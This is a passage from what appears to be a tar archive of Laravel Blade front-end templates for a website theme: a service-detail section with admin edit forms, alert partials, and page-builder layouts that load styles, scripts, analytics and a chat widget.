href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar"> <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.service.service-detail') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/service/service-detail.blade.php�����������������������������������������������������0000644�����������������00000060765�14765366572�0015702 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!--// Services Section Start //--> <section class="section"> <div class="container"> <div class="row"> <div class="col-lg-8 col-md-12"> @if(Auth::user()) @can('service check') <div class="easier-mode"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif @isset ($service_content) <div class="services-detail-top"> @if (!empty($service_content->section_image)) <img src="{{ asset('uploads/img/service/'.$service_content->section_image) }}" alt="Services image" class="img-fluid"> @if ($service->type == 'image') @if (!empty($service->section_image)) <span> <img src="{{ asset('uploads/img/service/'.$service->section_image) }}" alt="Services image" class="img-fluid"> </span> @endif @else <span class="{{ $service->icon }}"></span> @endif @endif </div> <div class="services-detail-inner"> <p>@php echo html_entity_decode($service_content->description); @endphp</p> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="services-detail-top"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="Services image" class="img-fluid"> <span class="fa fa-tablet"></span> </div> <div class="services-detail-inner"> <h2>We accelerated our web design and development process</h2> <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. </p> <p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour, or randomised words which don't look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn't anything embarrassing </p> </div> @endif @endisset @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-content.create"> <input type="hidden" name="style" value="{{ $service->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_service_content') }} </button> </form> </div> </div> @endcan @endif @if(Auth::user()) @can('service check') <div class="easier-mode"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif @isset ($service_info) <div class="web-design-process"> <div class="row"> <div class="col-md-6"> <div class="design-process-video"> @if (!empty($service_info->section_image)) <img src="{{ asset('uploads/img/service/'.$service_info->section_image) }}" alt="service info" class="img-fluid"> @endif @if (!empty($service_info->video_url)) @if ($service_info->video_type == 'youtube') <a class="design-process-video-btn" href="{{ $service_info->video_url }}"><i class="fa fa-play"></i></a> @else <a class="design-process-video-btn-2" href="{{ $service_info->video_url }}"><i class="fa fa-play"></i></a> @endif @endif </div> </div> <div class="col-md-6"> <div class="design-process-inner"> <h5>{{ $service_info->title }}</h5> @if (!empty($service_info->item)) @php $str = $service_info->item; $array_items = explode(",",$str); @endphp <ul> @foreach ($array_items as $item) <li> <i class="fa fa-check"></i> <span>{{ $item }}</span> </li> @endforeach @unset ($item) </ul> @endif </div> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="web-design-process"> <div class="row"> <div class="col-md-6"> <div class="design-process-video"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="" class="img-fluid"> <a class="design-process-video-btn" href="https://www.youtube.com/watch?v=YqQx75OPRa0"><i class="fa fa-play"></i></a> </div> </div> <div class="col-md-6"> <div class="design-process-inner"> <h5>The steps we followed in the Web Design process</h5> <ul> <li> <i class="fa fa-check"></i> <span>We plan the design first</span> </li> <li> <i class="fa fa-check"></i> <span>Drawing the project sketch</span> </li> <li> <i class="fa fa-check"></i> <span>Converting to psd with wireframe</span> </li> <li> <i class="fa fa-check"></i> <span>Converting psd design to html</span> </li> </ul> </div> </div> </div> </div> @endif @endisset @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-info.create"> <input type="hidden" name="style" value="{{ $service->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_service_info') }} </button> </form> </div> </div> @endcan @endif </div> <div class="col-lg-4 col-md-12"> <div class="widget-sidebar"> @if(Auth::user()) @can('service check') <div class="easier-mode"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif <div class="sidebar-widgets mb-3"> @isset ($service_feature_section) <h5 class="inner-header-title">{{ $service_feature_section->title }}</h5> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <h5 class="inner-header-title">Service Details</h5> @endif @endisset @if (is_countable($service_features) && count($service_features) > 0) <div class="sidebar-details-list"> <ul> @foreach ($service_features as $item) <li> @if(Auth::user()) @can('service check') <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-feature.edit"> <input type="hidden" name="style" value=""> <input type="hidden" name="service_id" value="{{ $service->id }}"> <input type="hidden" name="id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <h6>{{ $item->title }}<span>{{ $item->description }}</span></h6> </li> @endforeach @unset ($item) </ul> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="sidebar-details-list"> <ul> <li><h6>Service Name<span>Web Design</span></h6></li> <li><h6>Service Industry<span>Web,App</span></h6></li> <li><h6>Service Duration<span>2 Weeks</span></h6></li> <li><h6>Service Total Hours<span>336 Hour</span></h6></li> </ul> </div> @endif @endif </div> @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-feature.create"> <input type="hidden" name="style" value="{{ $service->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service-feature.create"> <input type="hidden" name="style" value="{{ $service->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.add_service_feature') }} </button> </form> </div> </div> @endcan @endif @if (is_countable($recent_services) && count($recent_services) > 0) <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.recent_services') }}</h5> @foreach ($recent_services as $item) <div class="recent-post-item clearfix"> <div class="recent-post-img mr-3"> @if (!empty($item->button_name)) <a href="{{ $item->button_url }}"> @if (!empty($item->section_image_2)) <img src="{{ asset('uploads/img/service/'.$item->section_image_2) }}" class="img-fluid image-size-100" alt="service image"> @else <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" class="img-fluid image-size-100" alt="service image"> @endif </a> @else <a href="{{ route('default-service-detail-show', ['service_slug' => $item->service_slug]) }}"> @if (!empty($item->section_image_2)) <img src="{{ asset('uploads/img/service/'.$item->section_image_2) }}" class="img-fluid image-size-100" alt="service image"> @else <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" class="img-fluid image-size-100" alt="service image"> @endif </a> @endif </div> <div class="recent-post-body"> @if (!empty($service_detail_show->page_uri)) <a href="{{ url($service_detail_show->page_uri.'/'.$item->service_slug) }}"> <h6 class="recent-post-title">{{ $item->title }}</h6> </a> @else <a href="{{ route('default-service-detail-show', ['service_slug' => $item->service_slug]) }}"> <h6 class="recent-post-title">{{ $item->title }}</h6> </a> @endif <p class="recent-post-date"><i class="far fa-calendar-alt"></i>{{ Carbon\Carbon::parse($item->created_at)->isoFormat('DD') }} {{ Carbon\Carbon::parse($item->created_at)->isoFormat('MMMM') }} {{ Carbon\Carbon::parse($item->created_at)->isoFormat('GGGG') }}</p> </div> </div> @endforeach @unset ($item) </div> @endif <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.copy_link_and_share') }}</h5> <ul class="sidebar-share clearfix"> <li> <div style="display: none;" id="hiddenURLDiv"></div> <a href="#" onclick="copyPageURL(); return false;"><i class="fa fa-link fa-facebook-f"></i></a> </li> </ul> </div> </div> </div> </div> </div> </section> <!--// Services Section End //--> �����������views/frontend/alert/alert-general.blade.php��������������������������������������������������������0000644�����������������00000003075�14765366572�0015162 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="row"> <div class="col-12"> @if($message = Session::get('success')) <div id="alert_message_contact" class="alert alert-success custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($message = Session::get('warning')) <div id="alert_message_contact" class="alert alert-warning custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($errors->any()) <div id="alert_message_contact" class="alert alert-danger custom-alert alert-dismissible fade show" role="alert"> <strong>{{ __('Whoops!') }}</strong> {{ __('There were some problems with your input.') }}<br><br> <ul> @foreach ($errors->all() as $error) <li>{{ __($error) }}</li> @endforeach </ul> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif </div> </div>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/alert/alert-subscribe.blade.php������������������������������������������������������0000644�����������������00000002171�14765366572�0015522 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="row"> <div class="col-12"> @if($message = Session::get('success')) <div id="alert_message" class="alert alert-success custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($errors->any()) <div id="alert_message" class="alert alert-danger custom-alert alert-dismissible fade show" role="alert"> <strong>{{ __('Whoops!') }}</strong> {{ __('There were some problems with your input.') }}<br><br> <ul> @foreach ($errors->all() as $error) <li>{{ __($error) }}</li> @endforeach </ul> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif </div> </div>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/alert/alert-contact.blade.php��������������������������������������������������������0000644�����������������00000003115�14765366572�0015173 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div class="row"> <div class="col-12"> @if($message = Session::get('success_contact')) <div id="alert_message_contact" class="alert alert-success custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($message = Session::get('warning_contact')) <div id="alert_message_contact" class="alert alert-warning custom-alert alert-dismissible fade show" role="alert"> <span>{{ __($message) }}</span> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif @if ($errors->any()) <div id="alert_message_contact" class="alert alert-danger custom-alert alert-dismissible fade show" role="alert"> <strong>{{ __('Whoops!') }}</strong> {{ __('There were some problems with your input.') }}<br><br> <ul> @foreach ($errors->all() as $error) <li>{{ __($error) }}</li> @endforeach </ul> <button type="button" class="close" data-dismiss="alert" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> @endif </div> </div>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/page_builder/empty-index.blade.php���������������������������������������������������0000644�����������������00000026617�14765366572�0016225 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar"> <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> <!--// Hero Section Start //--> <section class="hero-banner" data-scroll-index="1"> <div class="container"> <div class="row align-items-center"> <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp mx-auto"> <div class="hero-inner"> <h1> The page has not been created yet. </h1> <h2> Please make sure you create it. </h2> </div> </div> <div class="col-lg-5 col-xl-6 col-md-12 hero-img-resp wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.5s"> <div class="hero-img"> <div class="border-line-outer"> <div class="border-line-inner"> <img src="{{ asset('uploads/img/dummy/354x354.jpg') }}" title="banner image" alt="banner image" class="img-fluid"> </div> </div> </div> </div> </div> </div> </section> <!--// Hero Section End //--> </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') @include('frontend.sections.widget.fixed-button-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Zepto //--> <script src="{{ asset('assets/frontend/vendor/js/zepto.min.js') }}"></script> <!--// Vegas Slider //--> <script src="{{ asset('assets/frontend/vendor/js/vegas.slider.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> �����������������������������������������������������������������������������������������������������������������views/frontend/page_builder/index.blade.php���������������������������������������������������������0000644�����������������00000031166�14765366572�0015064 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} 